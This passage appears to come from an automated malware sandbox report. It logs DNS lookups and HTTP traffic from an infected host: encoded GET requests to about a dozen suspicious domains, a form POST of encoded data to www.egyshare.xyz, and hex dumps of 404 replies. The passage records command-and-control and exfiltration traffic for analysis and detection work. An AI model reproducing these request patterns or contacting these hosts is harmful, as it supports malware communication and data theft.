                Source: global trafficHTTP traffic detected: GET /010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.tals.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.cssa.auctionUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.acc888ommodate.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.070002018.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.startvin.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mdpc7.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.uynline.shop
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.egyshare.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bionanosolutions.info
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.acc888ommodate.xyz
                Source: global trafficDNS traffic detected: DNS query: www.070002018.xyz
                Source: global trafficDNS traffic detected: DNS query: www.startvin.top
                Source: global trafficDNS traffic detected: DNS query: www.mdpc7.top
                Source: global trafficDNS traffic detected: DNS query: www.phoenix88.sbs
                Source: unknownHTTP traffic detected: POST /lu7u/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Cache-Control: no-cacheContent-Length: 220Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.egyshare.xyzOrigin: http://www.egyshare.xyzReferer: http://www.egyshare.xyz/lu7u/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 30 50 49 58 42 66 39 3d 2f 62 37 47 67 69 4f 63 6b 36 53 4b 38 44 42 71 56 76 50 36 70 79 5a 48 67 53 46 61 51 78 6a 48 79 64 37 78 70 47 50 68 4a 7a 52 51 36 67 31 79 52 4a 4b 62 50 76 50 62 4d 64 33 44 38 4f 66 68 4d 62 36 2b 4d 42 66 47 31 51 4a 69 6a 43 4d 33 7a 67 38 48 55 48 6a 37 63 48 45 78 49 7a 45 6d 79 45 34 77 74 71 55 47 57 50 47 38 67 4a 57 31 4f 5a 43 2f 66 77 50 35 49 4f 67 5a 56 70 62 4a 58 47 77 4f 31 45 59 2f 51 7a 4c 6e 77 62 7a 58 6f 34 57 4f 77 4b 70 54 71 72 48 4f 57 39 63 72 72 33 37 73 65 37 45 2b 6f 6a 75 4a 30 6c 4d 39 70 33 49 46 4c 4e 61 35 70 61 6e 56 4a 50 57 35 35 75 41 6f 76 35 4b 55 69 79 6f 56 4f 54 4c 78 38 77 3d 3d Data Ascii: 0PIXBf9=/b7GgiOck6SK8DBqVvP6pyZHgSFaQxjHyd7xpGPhJzRQ6g1yRJKbPvPbMd3D8OfhMb6+MBfG1QJijCM3zg8HUHj7cHExIzEmyE4wtqUGWPG8gJW1OZC/fwP5IOgZVpbJXGwO1EY/QzLnwbzXo4WOwKpTqrHOW9crr37se7E+ojuJ0lM9p3IFLNa5panVJPW55uAov5KUiyoVOTLx8w==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:12:53 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:53 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:58 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 